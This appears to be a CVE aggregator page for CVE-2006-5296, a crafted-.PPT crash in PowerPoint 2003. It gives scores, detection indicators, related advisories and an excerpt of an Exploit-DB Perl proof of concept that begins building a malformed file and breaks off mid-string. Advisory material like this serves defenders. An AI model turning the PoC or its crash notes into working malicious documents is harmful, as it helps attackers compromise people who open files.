CVE-2006-5296
published 2006-10-16CVE-2006-5296: PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assisted…
PriorityP427medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
25.55%
97.7th percentile
PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assisted attackers to cause a denial of service (NULL dereference and application crash) via a crafted PowerPoint (.PPT) file, as demonstrated by Nanika.ppt, and a different vulnerability than CVE-2006-3435, CVE-2006-3876, CVE-2006-3877, and CVE-2006-4694. NOTE: the impact of this issue was originally claimed to be arbitrary code execution, but later analysis demonstrated that this was erroneous.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | powerpoint | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Malicious .PPT file triggers a null pointer dereference / call through ECX at offset 3001afbc in PowerPoint 2003 (fully patched); monitor for crashes or abnormal control flow in POWERPNT.EXE when opening .PPT files ↗
- →Crafted .PPT file begins with the OLE2 compound-document magic bytes D0 CF 11 E0 A1 B1 1A E1; scan incoming .PPT attachments for this header combined with anomalous stream sizes or overflow-indicative padding ↗
- →Trojan.PPDropper.G is the malware family associated with in-the-wild exploitation of this PowerPoint vulnerability; use this name as a detection signature in AV/EDR tooling ↗
- ·NVD notes uncertainty about whether CVE-2007-0913 (and its Trojan.PPDropper.G association) is the same issue as CVE-2006-5296 or several other related CVEs; treat the Trojan.PPDropper.G indicator with that ambiguity in mind ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j482-rx6m-8w32: Unspecified vulnerability in Microsoft Powerpoint allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as explo
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-0913 [CRITICAL] GHSA-j482-rx6m-8w32: Unspecified vulnerability in Microsoft Powerpoint allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as explo
Unspecified vulnerability in Microsoft Powerpoint allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as exploited by Trojan.PPDropper.G. NOTE: as of 20070213, it is not clear whether this is the same issue as CVE-2006-5296, CVE-2006-4694, CVE-2006-3876, CVE-2006-3877, or older issues.
GHSA
GHSA-4qf8-jx39-2cv9: PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assi
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2006-5296 [CRITICAL] GHSA-4qf8-jx39-2cv9: PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assi
PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assisted attackers to cause a denial of service (NULL dereference and application crash) via a crafted PowerPoint (.PPT) file, as demonstrated by Nanika.ppt, and a different vulnerability than CVE-2006-3435, CVE-2006-3876, CVE-2006-3877, and CVE-2006-4694. NOTE: the impact of this issue was originally claimed to be arbitrary code execution, but later analysis demonstrated that this was erroneous.
No detection rules found.
Exploit-DB
Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)
exploitdb·2006-10-12
CVE-2006-5296 Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)
Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)
---
#!/bin/perl
#
#PPT 0day poc
#
#OFFICE 2003 full Patch
#
#3001afbc 8b01 mov eax,[ecx] ds:0023:00000000=????????
#3001afbe 56 push esi
#3001afbf ff5014 call dword ptr [eax+0x14]
#try control ecx.............:P
#Maybe can Exploit
#
#
#[email protected]
#[email protected]
#www.chroot.org
my $ppt=
"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x0b".
"\x00\x00\x00\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\xff".
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
"\xff\xff\xff\xf
Exploit-DB
Microsoft Internet Explorer 7.0 Beta 2 - 'urlmon.dll' Denial of Service
exploitdb·2006-02-07
CVE-2006-0544 Microsoft Internet Explorer 7.0 Beta 2 - 'urlmon.dll' Denial of Service
Microsoft Internet Explorer 7.0 Beta 2 - 'urlmon.dll' Denial of Service
---
Tested on:
Windows XP SP2
Vulnerable Versions:
IE 7.0.5296.0
1/31/2006 Security-Protocols.com
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
!-->
# milw0rm.com [2006-02-07]
No writeups or analysis indexed.
http://blogs.technet.com/msrc/archive/2006/10/12/poc-published-for-ms-office-2003-powerpoint.aspxhttp://blogs.technet.com/msrc/archive/2006/11/10/follow-up-information-on-weblog-posting-about-poc-published-for-ms-office-2003-powerpoint.aspxhttp://research.eeye.com/html/alerts/zeroday/20061012_2.htmlhttp://secunia.com/advisories/22394http://securitytracker.com/id?1017059http://www.informationweek.com/management/showArticle.jhtml?articleID=193302553http://www.osvdb.org/29720http://www.securityfocus.com/bid/20495http://www.vupen.com/english/advisories/2006/4031https://exchange.xforce.ibmcloud.com/vulnerabilities/29507https://www.exploit-db.com/exploits/2523http://blogs.technet.com/msrc/archive/2006/10/12/poc-published-for-ms-office-2003-powerpoint.aspxhttp://blogs.technet.com/msrc/archive/2006/11/10/follow-up-information-on-weblog-posting-about-poc-published-for-ms-office-2003-powerpoint.aspxhttp://research.eeye.com/html/alerts/zeroday/20061012_2.htmlhttp://secunia.com/advisories/22394http://securitytracker.com/id?1017059http://www.informationweek.com/management/showArticle.jhtml?articleID=193302553http://www.osvdb.org/29720http://www.securityfocus.com/bid/20495http://www.vupen.com/english/advisories/2006/4031https://exchange.xforce.ibmcloud.com/vulnerabilities/29507https://www.exploit-db.com/exploits/2523
2006-10-16
Published